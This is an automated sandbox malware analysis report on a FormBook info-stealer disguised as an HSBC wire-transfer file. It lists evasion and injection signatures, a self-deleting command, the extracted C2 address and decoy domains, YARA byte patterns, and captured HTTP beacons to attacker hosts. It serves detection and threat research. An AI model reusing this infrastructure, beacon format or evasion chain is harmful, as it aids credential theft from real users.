Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report HSBC ... Wire Transfer Copy.exe

Overview

General Information

Sample Name:HSBC ... Wire Transfer Copy.exe
Analysis ID:528773
MD5:99b154970d15748d1df9025f675ecc76
SHA1:75503611daf18643a401c2020ae9e045111b7f1f
SHA256:13af03cd2db9c68bc397fd81f101287df005f27bc806737ffad390324a068d4c
Tags:exeFormbookHSBC
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HSBC ... Wire Transfer Copy.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: 99B154970D15748D1DF9025F675ECC76)
    • HSBC ... Wire Transfer Copy.exe (PID: 7164 cmdline: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe MD5: 99B154970D15748D1DF9025F675ECC76)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6672 cmdline: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.atlantiscompania.com/m4n8/"], "decoy": ["loganvineyard.com", "seanna-charters.com", "ironbandfitness.com", "centuriesandsleuthsreviews.com", "saminicky2022.com", "oscarlorenzo.online", "donaldlittlelaw.com", "internetbook.net", "dailyhealthyfood.com", "kostarelosdair.com", "baodingtangyang.com", "cumberlndfarms.com", "dylanmellor.xyz", "investwithelsa.com", "dermaaesthetika.com", "shoelife864.com", "nightcosex.biz", "greauxbooks.com", "artwithnumber.com", "hyggestudio.store", "vektor-pro.com", "bookextraevents.com", "poweredsky.store", "carver150.com", "greenfleetshippingco.com", "raise-ryokwpl.xyz", "lobbiru.com", "tilcep.xyz", "frist-universe.com", "thehumanityleague.com", "zz4321.com", "rightpowereletricalservices.com", "alainasdesigns.com", "getcardanocoin.com", "wattnow.biz", "nitromaxfmx.com", "rty161578.top", "danielthan.com", "devjmccormick.com", "clearwaterwaverunners.com", "onlineames.com", "pureproducts.xyz", "yoothdirect.info", "tryprovo.com", "mkuu88888.xyz", "fibers2you.com", "urdnauha.xyz", "andfme.com", "shopkoman.com", "civico46bcn.com", "top-online-fashion-24.com", "lakshimechatronicssystems.com", "cortezphoto.com", "samallondemolitonyorkshire.com", "uang.exchange", "gonderipaylasim.net", "piramsgprodiet.store", "parasmountplus.com", "sifangav.net", "gramaltinrafineri.com", "kvb5676.com", "atomhome.xyz", "catproductreviews.com", "frenchieaday.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 18 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.atlantiscompania.com/m4n8/"], "decoy": ["loganvineyard.com", "seanna-charters.com", "ironbandfitness.com", "centuriesandsleuthsreviews.com", "saminicky2022.com", "oscarlorenzo.online", "donaldlittlelaw.com", "internetbook.net", "dailyhealthyfood.com", "kostarelosdair.com", "baodingtangyang.com", "cumberlndfarms.com", "dylanmellor.xyz", "investwithelsa.com", "dermaaesthetika.com", "shoelife864.com", "nightcosex.biz", "greauxbooks.com", "artwithnumber.com", "hyggestudio.store", "vektor-pro.com", "bookextraevents.com", "poweredsky.store", "carver150.com", "greenfleetshippingco.com", "raise-ryokwpl.xyz", "lobbiru.com", "tilcep.xyz", "frist-universe.com", "thehumanityleague.com", "zz4321.com", "rightpowereletricalservices.com", "alainasdesigns.com", "getcardanocoin.com", "wattnow.biz", "nitromaxfmx.com", "rty161578.top", "danielthan.com", "devjmccormick.com", "clearwaterwaverunners.com", "onlineames.com", "pureproducts.xyz", "yoothdirect.info", "tryprovo.com", "mkuu88888.xyz", "fibers2you.com", "urdnauha.xyz", "andfme.com", "shopkoman.com", "civico46bcn.com", "top-online-fashion-24.com", "lakshimechatronicssystems.com", "cortezphoto.com", "samallondemolitonyorkshire.com", "uang.exchange", "gonderipaylasim.net", "piramsgprodiet.store", "parasmountplus.com", "sifangav.net", "gramaltinrafineri.com", "kvb5676.com", "atomhome.xyz", "catproductreviews.com", "frenchieaday.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: HSBC ... Wire Transfer Copy.exeVirustotal: Detection: 16%Perma Link
          Source: HSBC ... Wire Transfer Copy.exeReversingLabs: Detection: 40%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC ... Wire Transfer Copy.exe, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.217.168.83 80
          Source: C:\Windows\explorer.exeDomain query: www.gramaltinrafineri.com
          Source: C:\Windows\explorer.exeDomain query: www.catproductreviews.com
          Source: C:\Windows\explorer.exeDomain query: www.piramsgprodiet.store
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.atlantiscompania.com/m4n8/
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1Host: www.piramsgprodiet.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1Host: www.gramaltinrafineri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1Host: www.catproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:58:23 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:58:43 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: ipconfig.exe, 00000010.00000002.551598331.000000000403F000.00000004.00020000.sdmpString found in binary or memory: https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH
          Source: unknownDNS traffic detected: queries for: www.piramsgprodiet.store
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1Host: www.piramsgprodiet.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1Host: www.gramaltinrafineri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1Host: www.catproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
